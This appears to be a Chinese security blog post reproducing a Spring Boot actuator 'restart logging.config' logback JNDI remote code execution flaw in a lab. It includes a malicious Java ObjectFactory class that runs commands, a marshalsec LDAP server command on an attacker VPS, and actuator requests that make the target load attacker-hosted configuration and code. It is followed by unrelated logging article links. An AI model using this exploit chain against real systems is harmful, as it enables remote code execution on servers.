restart logging.config logback JNDI RCE

最新推荐文章于 2023-05-06 11:49:45 发布
最新推荐文章于 2023-05-06 11:49:45 发布
阅读量2.2k 收藏
点赞数
分类专栏: java安全 文章标签: spring 安全 安全漏洞 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121845843
版权

restart logging.config logback JNDI RCE

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce

漏洞复现:

  1. 在 VPS 上用 python3 -m http.server 80 命令开启 WEB 服务

  2. 编写实现 ObjectFactory 接口的恶意类,并上传至 VPS WEB 根目录

    import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import javax.naming.Context;
import javax.naming.Name;
import java.io.File;
import java.io.IOException;
import java.util.Hashtable;

public class CommandRaw extends AbstractTranslet implements javax.naming.spi.ObjectFactory{
    private static String cmd = "calc.exe";

    public CommandRaw() {
        String[] var1;
            var1 = new String[]{"cmd", "/C", cmd};
        try {
            Runtime.getRuntime().exec(var1);
        } catch (IOException var3) {
            var3.printStackTrace();
        }

    }

    public void transform(DOM var1, SerializationHandler[] var2) throws TransletException {
    }

    public void transform(DOM var1, DTMAxisIterator var2, SerializationHandler var3) throws TransletException {
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
        return new Object();
    }
}

  3. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.137.204.238:80/#CommandRaw 1389 命令在 VPS 上开启 LDAP 服务

  4. 访问 actuator/env 接口修改 logging.config 属性值

    http://127.0.0.1:9098/actuator/restart
application/json

{"name":"logging.config","value":"http://10.137.204.238/example02.xml"}

  5. 访问 actuator/restart 接口重启应用

    http://127.0.0.1:9098/actuator/restart
application/json

漏洞原理:

通过访问 actuator/env 接口修改 logging.config 属性值,logging.config 属性值指定 Logback 组件的日志配置文件位置,然后重启应用触发目标访问搭建好的恶意 LDAP 服务,造成 LDAP 注入,跟 jolokia logback JNDI RCE 其实大差不差

注意点:

  1. 恶意类需要实现 ObjectFactory 接口
  2. VPS 上的 xml 文件内容语法不能为畸形,否则服务器会异常退出

Referenct:

https://github.com/LandGrey/SpringBootVulExploit

0x6b79
关注
专栏目录
Spring Boot - 日志文件配置,logback 配置(超详细)
CYK_byte的博客
02-20 9173
我们的Java程序在IDEA中执行完后,都会编译生成一个target文件,这个文件就是项目最终执行的代码(去掉注释等一系列工作后的文件),那么想要知道lombok的实现原理,就需要去观察这个文件~在生产环境下需要将日志信息保留下来,便于出现问题以后容易追溯问题,将日志保存下来这个活动叫做日志持久化。我们只需要在配置文件中指定日志的存储目录或者是指定日志保存文件名即可,如下。Ps:在没有指定文件名两次保存或者指定相同文件名进行两次保存的情况下,Ps:logger 对象是属于 org.slf4j 包下!
Spring Boot restart logging.config logback JNDI RCE漏洞复现
Bird&Bird
03-13 1006
但为了让程序不抛错退出,需要针对性的修改用到的代码,比如修改 JNDIExploit/src/main/java/com/feihong/ldap/template/CommandTemplate.java 文件,让其返回的 class 字节码继承 javax.naming.spi.ObjectFactory 接口。⚠️ JNDI 服务返回的 object 需要实现 javax.naming.spi.ObjectFactory 接口,否则会导致程序异常退出。
jolokia logback JNDI RCE
12-08 1472
jolokia logback JNDI RCE漏洞分析
Spring Boot干货系列:(七)默认日志logback配置解析 | 掘金技术征文
weixin_34128501的博客
04-20 1336
原本地址:Spring Boot干货系列:(七)默认日志logback配置解析博客地址:tengj.top/ 前言 今天来介绍下Spring Boot如何配置日志logback,我刚学习的时候,是带着下面几个问题来查资料的,你呢 如何引入日志? 日志输出格式以及输出方式如何配置? 代码中如何使用? 正文 Spring Boot在所有内部日志中使用Commons Logging,但是默认配置...
logback 日志输出配置
.NET 人工智能实践
11-20 944
logback 日志输出配置
【Java开发工具】logback——日志配置
weixin_44275259的博客
08-25 409
日志配置——基础知识 日志——level DEBUG:log.debug放的的数据信息,通常是程序调试的细节 WARN:log.warn放入的数据信息,通常是警告性的一些数据 INFO:log.info放入的数据信息,通常是实体数据的展示 ERROR:log.error放入的数据信息,通常是异常后对参数的展示 FATAL:log.fatal放的数据信息,通常是 日志——appender org.apache.log4j.ConsoleAppender(控制台) org.apache.log4j.FileAp
Python通过logging.config.fileConfig()配置日志
热门推荐
天涯的博客
09-11 1万+
1、简介 Python添加配置的方式有好几种,这里只介绍通过config文件方式,配置log日志。相对于直接在文件中配置日志,这种配置方式可以将日志配置和代码分离,方便代码的维护和日志管理。 2、步骤 新建配置文件logging.conf,用于存放logging配置文件的信息。 [loggers] # 配置logger信息。必须包含一个名字叫做root的logger,当使用无参函数log...
Springboot整合Logback java.lang.IllegalStateException: Logback configuration error detected:
smile_foreach的博客
12-14 2160
Exception in thread "restartedMain" java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Na...
【异常】ERROR in ch.qos.logback.core.joran.spi.Interpreter@159:22 - no applicable action for [charset], ...
weixin_30342827的博客
09-08 4461
一、异常信息 Exception in thread "restartedMain" java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAcces...
LINUX内核编译--Makefile、.config、Kconfig、menuconfig解析
stm32_newlearner的博客
11-18 4513
LINUX内核编译–Makefile、.config、Kconfig、menuconfig关系说明 Makefile makefile定义了一系列的规则来指定,哪些文件需要先编译,哪些文件需要后编译,哪些文件需要重新编译,甚至于进行更复杂的功能操作,因为 makefile就像一个Shell脚本一样,其中也可以执行操作系统的命令。 makefile文件是脚本文件,在内核目录(/home/topeet...
配置logback-spring.xml不生效
知识改变命运,ヾ(◍°∇°◍)ノ゙【求关注】
04-19 1103
按照以往的配置文件,始终不生成文件, ┭┮﹏┭┮。
Spring Boot (日志篇):集成默认日志logback
Soinice的博客
09-05 934
目录 说在前面 logbackSpring Boot 默认日志) 在pom.xml加入相关依赖 日志级别 控制台输出 lombok方式 日志文件输出 保存路径 级别控制 输出格式 自定义日志配置 根节点包含的属性 属性一: 设置上下文名称 属性二: 设置变量 子节点一:添加器 子节点二:根节点 子节点三: 总结 源码下载 说在前面 作为开发,日志是可以说...
logback多环境日志配置(SpringBoot项目)
咔咔学长
06-07 4779
使用场景   线上环境启动项目时,把程序的日志输出到指定的日志文件中。控制台中不打印日志,这样可以节省磁盘IO资源。而在本地启动时,把日志直接输出到控制台即可,方便排查问题。 此时,就需要根据不同的环境,使用不同的日志输出策略。 方式一:springProfile标签 在同一份日志配置文件中,编写指定的日志输出策略。 1. logback-spring.xml文件 在springProfile标签内编写日志输出规则,标签中的name属性值就是环境的编码。 <?xml version="1.0" enc
logbackspringBoot中的使用
DayDayUp的博客
05-06 1826
java web 下有好几种日志框架,比如:logback,log4j,log4j2(slf4j 并不是一种日志框架,它相当于定义了规范,实现了这个规范的日志框架就能够用 slj4f 调用)它们都实现了slf4j的接口。其中性能最高的应该使 logback 了,而且 springboot 默认使用的也是 logback 日志,所以本篇将会详细的讲解 logback 的日志配置方案。
SpringBoot漏洞大全
yggcwhat
05-28 1万+
SpringBoot漏洞大全
restart漏洞
12-10 588
restart漏洞
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 4610
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
logback日志配置及使用
weixin_43790613的博客
11-01 6146
配置介绍 日志级别从低到高 TRACE < DEBUG < INFO < WARN < ERROR < FATAL 只能展示大于或等于设置的日志级别的日志 日志配置文件名 Logbacklogback.xml, logback-spring.xml, logback-spring.groovy, logback.groovy Log4j:log4j.properties, log4j.xml,log4j-spring.properties, log4j-spring.x
logback日志
AAAAAAAdagw的博客
06-11 416
前言 本篇博客主要介绍了如何在SpringBoot框架下打印输出日志,包括控制台的日志输出,将日志输出到文件,打印输出sql语句等功能。 一、添加依赖文件 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-logging</artifactId> <
* * Restart config... * * * General setup
最新发布
11-16
根据提供的引用内容,可以看出您正在编译内核时遇到了问题。在编译内核时,如果.config文件已经存在,则不需要重新配置内核。但是,如果您在编译内核时遇到“Restart config”提示,则可能是由于.config文件已经损坏或不完整,需要重新配置内核。您可以使用以下命令重新配置内核: ```shell make menuconfig ``` 此命令将打开内核配置菜单,您可以在其中进行必要的配置更改。如果您想使用默认配置,则可以使用以下命令: ```shell make defconfig ``` 此命令将使用默认配置文件.config进行配置。如果您想使用自己的配置文件,则可以使用以下命令: ```shell make oldconfig ``` 此命令将使用旧的配置文件.config进行配置,并提示您更新新的配置选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值